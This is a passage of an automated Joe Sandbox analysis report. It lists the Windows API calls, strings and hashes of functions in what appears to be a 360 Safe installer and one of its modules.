                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd__getptd_noexit__initptd
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3358092440-0
                                                                                                                                                                      • Opcode ID: 880540e254bb7c8d1e3b0a1614399f70b56404b356880a377a218bd2f456ac97
                                                                                                                                                                      • Instruction ID: 06c9ea53dc17a7f0ab0a623f622c844888f9c6078837fdef0d9da10913817cd7
                                                                                                                                                                      • Opcode Fuzzy Hash: 880540e254bb7c8d1e3b0a1614399f70b56404b356880a377a218bd2f456ac97
                                                                                                                                                                      • Instruction Fuzzy Hash: CD112332500A89EFDB11BFA6DC868AF7BE5FF24320B10403DF612930A1EB719D418B61
                                                                                                                                                                      Function 001D1DA8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • _memset.LIBCMT ref: 001D1DD0
                                                                                                                                                                      • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,?,00000000,0017BD49,?), ref: 001D1E06
                                                                                                                                                                      • DeviceIoControl.KERNEL32(00000000,002D1080,00000000,00000000,?,0000000C,?,00000000), ref: 001D1E30
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,0017BD49,?), ref: 001D1E3B
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,0017BD49,?), ref: 001D1E43
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseHandle$ControlCreateDeviceFile_memset
                                                                                                                                                                      • String ID: \\.\%c:
                                                                                                                                                                      • API String ID: 2281634102-1260769427
                                                                                                                                                                      • Opcode ID: e034716cb6632eea3f80fc6dd67c2ae849577f5682ec9e16c211905b58180573
                                                                                                                                                                      • Instruction ID: a396c42e82dadab17dc07dcd08b54af82b7b6117c7dee6595a0a20d3736a63c6
                                                                                                                                                                      • Opcode Fuzzy Hash: e034716cb6632eea3f80fc6dd67c2ae849577f5682ec9e16c211905b58180573
                                                                                                                                                                      • Instruction Fuzzy Hash: EA11B6B2641228BBDB209BA5AC4DEEB7BACEF25710F104151F915D3181DB709A40CBB0
                                                                                                                                                                      Function 001D5637 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3_catch.LIBCMT ref: 001D563E
                                                                                                                                                                      • GetDC.USER32(00000000), ref: 001D564B
                                                                                                                                                                        • Part of subcall function 001D548F: _memset.LIBCMT ref: 001D54B5
                                                                                                                                                                        • Part of subcall function 001D548F: GetVersionExW.KERNEL32(?), ref: 001D54C8
                                                                                                                                                                      • EnumFontFamiliesW.GDI32(00000000,00000000,001D559A), ref: 001D5666
                                                                                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 001D56BF
                                                                                                                                                                      • CreateFontW.GDI32(000000F4,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000086,00000000,00000000,00000000,00000020,?), ref: 001D56DF
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Font$CreateEnumFamiliesH_prolog3_catchReleaseVersion_memset
                                                                                                                                                                      • String ID: Tahoma
                                                                                                                                                                      • API String ID: 3542596840-3580928618
                                                                                                                                                                      • Opcode ID: 7cc44732e6ce924048765c5c644a5b3183f6412fe31f5db543fe9558b20a59cf
                                                                                                                                                                      • Instruction ID: 0a1e9da0ab67214f1006cb2bf416d42f2adad0bcf8a5985b8fdec1ba5bdbe31f
                                                                                                                                                                      • Opcode Fuzzy Hash: 7cc44732e6ce924048765c5c644a5b3183f6412fe31f5db543fe9558b20a59cf
                                                                                                                                                                      • Instruction Fuzzy Hash: D311A731140BC076D73497A29C4DFA76EBADBEAB04F40C40DF996466D0EFB49480CB20
                                                                                                                                                                      Function 001CD372 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51serviceCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 001C8657: _memset.LIBCMT ref: 001C867B
                                                                                                                                                                        • Part of subcall function 001C8657: _memset.LIBCMT ref: 001C868C
                                                                                                                                                                        • Part of subcall function 001C8657: GetVersionExW.KERNEL32(?,?,?,?,?,?,00000000), ref: 001C86A1
                                                                                                                                                                        • Part of subcall function 001C8657: GetVersionExW.KERNEL32(?,?,?,?,?,?,00000000), ref: 001C86B2
                                                                                                                                                                        • Part of subcall function 001C8657: GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,?,?,?,00000000), ref: 001C86C2
                                                                                                                                                                        • Part of subcall function 001C8657: GetProcAddress.KERNEL32(00000000), ref: 001C86C9
                                                                                                                                                                        • Part of subcall function 001C8657: GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,00000000), ref: 001C86D7
                                                                                                                                                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,?,00000000,?,?,?,?,?,001CEAAD,?,0017BD49,00100000,00000000,0000008C), ref: 001CD391
                                                                                                                                                                      • OpenServiceW.ADVAPI32(00000000,360FsFlt,00000034,?,?,?,?,001CEAAD,?,0017BD49,00100000,00000000,0000008C), ref: 001CD3A5
                                                                                                                                                                      • QueryServiceStatusEx.ADVAPI32(00000000,00000000,?,00000024,0000008C,?,?,?,?,001CEAAD,?,0017BD49,00100000,00000000,0000008C), ref: 001CD3BD
                                                                                                                                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,001CEAAD,?,0017BD49,00100000,00000000,0000008C), ref: 001CD3D5
                                                                                                                                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,001CEAAD,?,0017BD49,00100000,00000000,0000008C), ref: 001CD3D8
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Service$Handle$CloseOpenVersion_memset$AddressInfoManagerModuleNativeProcQueryStatusSystem
                                                                                                                                                                      • String ID: 360FsFlt
                                                                                                                                                                      • API String ID: 470164251-3852983893
                                                                                                                                                                      • Opcode ID: 2b43bc636b1057d2d5356c3ba76aa090364cea83cc150d0d9034140846fc1ec3
                                                                                                                                                                      • Instruction ID: c7e8e4f45638978d46de3ff4c44d2c78a45feb874d140d20d9d50922926d3e35
                                                                                                                                                                      • Opcode Fuzzy Hash: 2b43bc636b1057d2d5356c3ba76aa090364cea83cc150d0d9034140846fc1ec3
                                                                                                                                                                      • Instruction Fuzzy Hash: 5FF0A9726001186FEB20AB65BCC9FFF769CE799794B111139FA01F6080DFA0DD059572
                                                                                                                                                                      Function 5F52AC74 Relevance: 9.1, APIs: 6, Instructions: 71threadCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • ___set_flsgetvalue.LIBCMT ref: 5F52ACA5
                                                                                                                                                                      • __calloc_crt.LIBCMT ref: 5F52ACB1
                                                                                                                                                                      • __getptd.LIBCMT ref: 5F52ACBE
                                                                                                                                                                      • CreateThread.KERNEL32(?,?,5F52ABF1,00000000,?,?), ref: 5F52ACF5
                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,00000000), ref: 5F52ACFF
                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 5F52AD17
                                                                                                                                                                        • Part of subcall function 5F52DC8C: __getptd_noexit.LIBCMT ref: 5F52DC8C
                                                                                                                                                                        • Part of subcall function 5F528356: __decode_pointer.LIBCMT ref: 5F528361
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd__getptd_noexit
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1803633139-0
                                                                                                                                                                      • Opcode ID: 800b2ce824d7d1c8a9382a6b272946c7debb885c631a0c484379d25758db5592
                                                                                                                                                                      • Instruction ID: 7f4d9cf506d1389f3a6d4355d9dc10f05fbd42fea07952615b9ad9c8a165456f
                                                                                                                                                                      • Opcode Fuzzy Hash: 800b2ce824d7d1c8a9382a6b272946c7debb885c631a0c484379d25758db5592
                                                                                                                                                                      • Instruction Fuzzy Hash: 3E11C8B2503305AFDB00AFE8DD818DF7BE4EF84321B10463AF505D71D1EB31990186A1
                                                                                                                                                                      Function 001817D4 Relevance: 9.1, APIs: 6, Instructions: 51timefileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000003,00000080,00000000), ref: 001817F0
                                                                                                                                                                      • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 00181808
                                                                                                                                                                      • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00181831
                                                                                                                                                                      • SetFileTime.KERNEL32(00000000,?,00000000,?), ref: 0018183F
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00181846
                                                                                                                                                                      • SetFileAttributesW.KERNEL32(?,?), ref: 00181853
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$Time$AttributesCloseCreateDateHandleLocal
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 820720069-0
                                                                                                                                                                      • Opcode ID: 65c18ae42cc1f726b62f6e9a665a6432a1a1d74b32a89e5b0cecf4793160c316
                                                                                                                                                                      • Instruction ID: bf7dd32460e4d9ad2a9db5ceeaecf6ee52fde50f0f9eaee6ee9ef72be70b1629
                                                                                                                                                                      • Opcode Fuzzy Hash: 65c18ae42cc1f726b62f6e9a665a6432a1a1d74b32a89e5b0cecf4793160c316
                                                                                                                                                                      • Instruction Fuzzy Hash: C7115B32900219BBEF119F94EC49FEE7B7CEB05711F058065FD11E7190DB709A118B50
                                                                                                                                                                      Function 001A73D5 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 105COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 001A73F4
                                                                                                                                                                      • _memset.LIBCMT ref: 001A7422
                                                                                                                                                                        • Part of subcall function 001E3480: _memset.LIBCMT ref: 001E34C1
                                                                                                                                                                        • Part of subcall function 001E3480: _memset.LIBCMT ref: 001E34DE
                                                                                                                                                                        • Part of subcall function 001E3480: lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,0024CDA4,00000000), ref: 001E34ED
                                                                                                                                                                        • Part of subcall function 001A71E2: _memset.LIBCMT ref: 001A7216
                                                                                                                                                                        • Part of subcall function 001A71E2: SHGetValueW.SHLWAPI(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe,Path,?,?,?,?,?,0024CDA4), ref: 001A7239
                                                                                                                                                                        • Part of subcall function 001A71E2: PathCombineW.SHLWAPI(?,?,360safe.exe,?,?,?,0024CDA4), ref: 001A7269
                                                                                                                                                                        • Part of subcall function 001A71E2: PathFileExistsW.SHLWAPI(?,?,?,0024CDA4), ref: 001A7273
                                                                                                                                                                      Strings
                                                                                                                                                                      • http://s.360.cn/safe/instcomp.htm?soft=%d&status=%d&m=%s&from=%s&vv=10&installed=%d, xrefs: 001A7473
                                                                                                                                                                      • &pid=, xrefs: 001A74CF
                                                                                                                                                                      • &ver=, xrefs: 001A74AF
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _memset$Path$CombineExistsFileH_prolog3Valuelstrlen
                                                                                                                                                                      • String ID: &pid=$&ver=$http://s.360.cn/safe/instcomp.htm?soft=%d&status=%d&m=%s&from=%s&vv=10&installed=%d
                                                                                                                                                                      • API String ID: 3972583164-2772831180
                                                                                                                                                                      • Opcode ID: bb392ac73476ab6b243ac548159e250bd23e1677ae4b81d92ed11b751db3acfa
                                                                                                                                                                      • Instruction ID: 2467285049477bba2743ab410ab481c72623f71bc5db35153125c7669709df79
                                                                                                                                                                      • Opcode Fuzzy Hash: bb392ac73476ab6b243ac548159e250bd23e1677ae4b81d92ed11b751db3acfa
                                                                                                                                                                      • Instruction Fuzzy Hash: 04318D76910259ABCB14FBE4DC96AFEB3B8BF29304F004418F915A71C2EB346A19C761
                                                                                                                                                                      Function 5F4FADFF Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 103COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      • [%d.] CheckFile p2s Start , xrefs: 5F4FAEEA
                                                                                                                                                                      • [%d.] Rename start , xrefs: 5F4FAF2F
                                                                                                                                                                      • [%d.] CheckFile Start , xrefs: 5F4FAEA6
                                                                                                                                                                      • [%d.]No CheckFileMsg FileSize:%I64d , xrefs: 5F4FAE69
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: H_prolog3_
                                                                                                                                                                      • String ID: [%d.] CheckFile Start $[%d.] CheckFile p2s Start $[%d.] Rename start $[%d.]No CheckFileMsg FileSize:%I64d
                                                                                                                                                                      • API String ID: 2427045233-3735358712
                                                                                                                                                                      • Opcode ID: c2436980802cc161f4e22a728d6b8860c8ce3fb11e87ded59ebb82373b73906a
                                                                                                                                                                      • Instruction ID: a2660052f23a3c0db5da586af125b849418d592b0db9c019f803680ad9ee62f5
                                                                                                                                                                      • Opcode Fuzzy Hash: c2436980802cc161f4e22a728d6b8860c8ce3fb11e87ded59ebb82373b73906a
                                                                                                                                                                      • Instruction Fuzzy Hash: BF31B6F1E417009FCB54BAF4C890DAEB3E2EF84220B14493ED55F97341EA34A849C7A1
                                                                                                                                                                      Function 001E28D0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 82fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00172750: _vswprintf_s.LIBCMT ref: 00172783
                                                                                                                                                                      • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,?,00000104,00000000), ref: 001E291E
                                                                                                                                                                      • DeviceIoControl.KERNEL32 ref: 001E296D
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 001E29BD
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseControlCreateDeviceFileHandle_vswprintf_s
                                                                                                                                                                      • String ID: %02X%02X%02X%02X%02X%02X$\\.\%s
                                                                                                                                                                      • API String ID: 2864800763-1525991222
                                                                                                                                                                      • Opcode ID: 5325e7bd4194d55b69de83fae831ddaef51b3c283c155176887ec9081b16bf9c
                                                                                                                                                                      • Instruction ID: 5c523c696d75a3cbc21304bcea26eb9277d011ab72575c2e81f53a8c42e276ab
                                                                                                                                                                      • Opcode Fuzzy Hash: 5325e7bd4194d55b69de83fae831ddaef51b3c283c155176887ec9081b16bf9c
                                                                                                                                                                      • Instruction Fuzzy Hash: AF21E5B11083906ED324EB65DC99EFFB6ECAF9D305F40891DF6E982181D67889448762
                                                                                                                                                                      Function 0019869E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 001986BD
                                                                                                                                                                      • _memset.LIBCMT ref: 001986F8
                                                                                                                                                                      • GetClassNameW.USER32(?,00000000,00000104), ref: 0019870B
                                                                                                                                                                        • Part of subcall function 00177FA1: __wcsicoll.LIBCMT ref: 00177FB9
                                                                                                                                                                      • IsDialogMessageW.USER32(?,?), ref: 00198757
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ClassDialogH_prolog3MessageName__wcsicoll_memset
                                                                                                                                                                      • String ID: EDIT
                                                                                                                                                                      • API String ID: 858151411-3080729518
                                                                                                                                                                      • Opcode ID: 441353c10504e037a6842f5312685ff64688444dcdba846559d49eb064941109
                                                                                                                                                                      • Instruction ID: c0082edea9045fdbf1335515a871879780deee6b33873d4a46dbd36c49b7d752
                                                                                                                                                                      • Opcode Fuzzy Hash: 441353c10504e037a6842f5312685ff64688444dcdba846559d49eb064941109
                                                                                                                                                                      • Instruction Fuzzy Hash: ED2105759002489BDF28EFA4EC49AFE73A5FF26710F108929E926D72D1DF30A944C760
                                                                                                                                                                      Function 5F4DC462 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 53fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateFileW.KERNEL32(?,00000000,00000000,00000000,00000003,00000080,00000000,?,?,5F4DCDEF,?), ref: 5F4DC48D
                                                                                                                                                                      • GetLastError.KERNEL32(?,?,5F4DCDEF,?), ref: 5F4DC4A4
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,5F4DCDEF,?), ref: 5F4DC499
                                                                                                                                                                        • Part of subcall function 5F51405E: _memset.LIBCMT ref: 5F514091
                                                                                                                                                                        • Part of subcall function 5F51405E: wvnsprintfW.SHLWAPI(?,000003FF,5F5BC288,5F4FE1F9), ref: 5F5140AC
                                                                                                                                                                      Strings
                                                                                                                                                                      • exception raised in method CFileMgr::IsFileExisting, parameter pFileName can not be null, xrefs: 5F4DC471
                                                                                                                                                                      • IsFileExisting Error = %d, xrefs: 5F4DC4D5
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseCreateErrorFileHandleLast_memsetwvnsprintf
                                                                                                                                                                      • String ID: IsFileExisting Error = %d$exception raised in method CFileMgr::IsFileExisting, parameter pFileName can not be null
                                                                                                                                                                      • API String ID: 162527170-4251026172
                                                                                                                                                                      • Opcode ID: c4fb67abbaeeb17b8c594129421b2efb50282dd80a162bcbf3171b4d188ab24c
